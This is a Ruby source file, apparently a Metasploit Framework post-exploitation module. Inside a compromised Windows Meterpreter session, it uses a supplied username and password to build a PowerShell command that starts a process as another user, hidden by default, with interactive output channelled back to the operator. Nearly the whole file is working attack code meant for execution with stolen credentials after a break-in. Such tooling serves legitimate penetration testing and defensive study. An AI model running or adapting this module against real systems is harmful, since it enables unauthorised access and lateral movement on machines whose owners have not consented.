1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Powershell
8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => "Windows 'Run As' Using PowerShell",
13
        'Description' => %q{ This module will start a process as another user using PowerShell. },
14
        'License' => MSF_LICENSE,
15
        'Author' => ['p3nt4'],
16
        'Platform' => ['win'],
17
        'SessionTypes' => ['meterpreter'],
18
        'Compat' => {
19
          'Meterpreter' => {
20
            'Commands' => %w[
21
              stdapi_sys_process_execute
22
            ]
23
          }
24
        },
25
        'Notes' => {
26
          'Stability' => [CRASH_SAFE],
27
          'SideEffects' => [],
28
          'Reliability' => []
29
        }
30
      )
31
    )
32
    register_options(
33
      [
34
        OptString.new('USER', [true, 'User to run executable as', nil]),
35
        OptString.new('PASS', [true, 'Password of user', nil]),
36
        OptString.new('DOMAIN', [false, 'Domain of user', '']),
37
        OptString.new('EXE', [true, 'Executable to run', 'cmd.exe']),
38
        OptString.new('ARGS', [false, 'Arguments', nil]),
39
        OptString.new('PATH', [true, 'Working Directory', 'C:\\']),
40
        OptBool.new('CHANNELIZE', [true, 'Channelize output, required for reading output or interacting', true]),
41
        OptBool.new('INTERACTIVE', [true, 'Run interactively', true]),
42
        OptBool.new('HIDDEN', [true, 'Hide the window', true])
43
      ]
44
    )
45
  end
46

47
  def run
48
    fail_with(Failure::BadConfig, 'PowerShell is not available') unless have_powershell?
49

50
    # Variable Setup
51
    user = datastore['user']
52
    pass = datastore['pass']
53
    domain = datastore['domain']
54
    exe = datastore['exe'].gsub('\\', '\\\\\\\\')
55
    inter = datastore['interactive']
56
    args = datastore['args']
57
    path = datastore['path'].gsub('\\', '\\\\\\\\')
58
    channelized = datastore['channelize']
59
    hidden = datastore['hidden']
60

61
    if user.include?('\\')
62
      domain = user.split('\\')[0]
63
      user = user.split('\\')[1]
64
    end
65

66
    # Check if session is interactive
67
    if !session.interacting && inter
68
      print_error('Interactive mode can only be used in a meterpreter console')
69
      print_error("Use 'run post/windows/manage/run_as_psh USER=x PASS=X EXE=X' or 'SET INTERACTIVE false'")
70
      raise 'Invalid console'
71
    end
72

73
    # Prepare powershell script
74
    scr = "$pw = convertto-securestring '#{pass}' -asplaintext -force; "
75
    scr << "$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist '#{domain}\\#{user}',$pw; "
76
    scr << "Start-process '#{exe}' -WorkingDirectory '#{path}' -Credential $pp"
77
    if args && args != ''
78
      scr << " -argumentlist '#{args}' "
79
    end
80

81
    if hidden
82
      print_status('Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false')
83
      scr << ' -WindowStyle hidden'
84
    end
85

86
    scr = " -c \"#{scr}\""
87
    # Execute script
88
    p = client.sys.process.execute(
89
      'powershell.exe', scr,
90
      'Channelized' => channelized,
91
      'Desktop' => false,
92
      'Session' => false,
93
      'Hidden' => true,
94
      'Interactive' => inter,
95
      'InMemory' => false,
96
      'UseThreadToken' => false
97
    )
98
    print_status("Process #{p.pid} created.")
99
    print_status("Channel #{p.channel.cid} created.") if p.channel
100

101
    # Process output
102
    if inter && p.channel
103
      client.console.interact_with_channel(p.channel)
104
    elsif p.channel
105
      data = p.channel.read
106
      print_line(data) if data
107
    end
108
  end
109
end
110

111